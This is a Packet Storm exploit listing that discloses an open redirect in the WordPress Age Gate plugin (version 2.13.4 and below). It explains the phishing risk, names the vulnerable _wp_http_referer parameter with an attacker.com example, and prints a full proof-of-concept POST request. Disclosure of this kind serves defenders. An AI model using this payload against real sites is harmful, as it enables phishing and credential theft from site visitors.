exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Age Gate 2.13.4 Open Redirect

WordPress Age Gate 2.13.4 Open Redirect
Posted Nov 27, 2020
Authored by Ilca Lucian Florin

WordPress Age Gate plugin versions 2.13.4 and below suffer fro an open redirection vulnerability.

tags | exploit
SHA-256 | 1fb8756a3c916898cce344aa523ef8ae14e2114dc3665716be68892817ef0afa

WordPress Age Gate 2.13.4 Open Redirect

Change Mirror Download
# Exploit Title: URL Redirection to Untrusted Site ('Open Redirect') Age
Gate Wordpress Plugin <= 2.13.4
# Date: 11/27/2020
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: https://agegate.io/
# Software Link: https://wordpress.org/plugins/age-gate/
# Version: <= 2.13.4
# Tested on: Latest Version of Desktop Web Browsers: Chrome, Firefox,
Microsoft Edge
# CVE: Waiting...

A web application accepts a user-controlled input that specifies a link to
an external site, and uses that link in a Redirect. This simplifies
phishing attacks. An http parameter may contain a URL value and could cause
the web application to redirect the request to the specified URL. By
modifying the URL value to a malicious site, an attacker may successfully
launch a phishing scam and steal user credentials. Because the server name
in the modified link is identical to the original site, phishing attempts
have a more trustworthy appearance. The impacts can be many, and vary from
the theft of information and credentials to the redirection to malicious
websites containing attacker-controlled content, which in some cases even
cause XSS attacks. So even though an open redirection might sound harmless
at first, the impacts of it can be severe should it be exploitable.

An Open Redirection is when a web application or server uses an unvalidated
user-submitted link to redirect the user to a given website or page. Even
though it seems like a harmless action to let a user decide to which page
he wants to be redirected, such technique if exploited can have a serious
impact on the application security, especially when combined with other
vulnerabilities and tricks.

Vulnerable parameter is: _wp_http_referer=http://attacker.com

# Example of burp request #

POST /wp-admin/admin-post.php HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
Origin: https://website.com
Connection: close
Referer: https://website.com/
Cookie: wordpress_sec_5fabc=editor%7C1606490639%b%abc;
__cfduid=def4624292458dcfae5008c89bb76b3ed1606317827; ftc_post_view_4716=1;
wordpress_test_cookie=WP%20Cookie%20check;
wordpress_logged_in_123=editor%%%abc;
wp-wpml_current_admin_language_d41d8cd98f00b204e9800998ecf8427e=mk;
wfwaf-authcookie-abc=12%7Ceditor%abc; tk_ai=woo%;
wp-settings-time-12=1606317841; wp-wpml_current_language=en;
ftc_post_view_934=1; _ga=GA1.2.; _gid=GA1.2.; _gat=1
Upgrade-Insecure-Requests: 1

age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=
https://google.ro

Demo:

1. https://ibb.co/1K9MhhY
2. https://ibb.co/xSYQjZm
3. https://ibb.co/TMbS9yL

C.V.S.S Score: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L / 7.1 (High)

There are over 20.000 wordpress websites using this plugin at this moment.
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close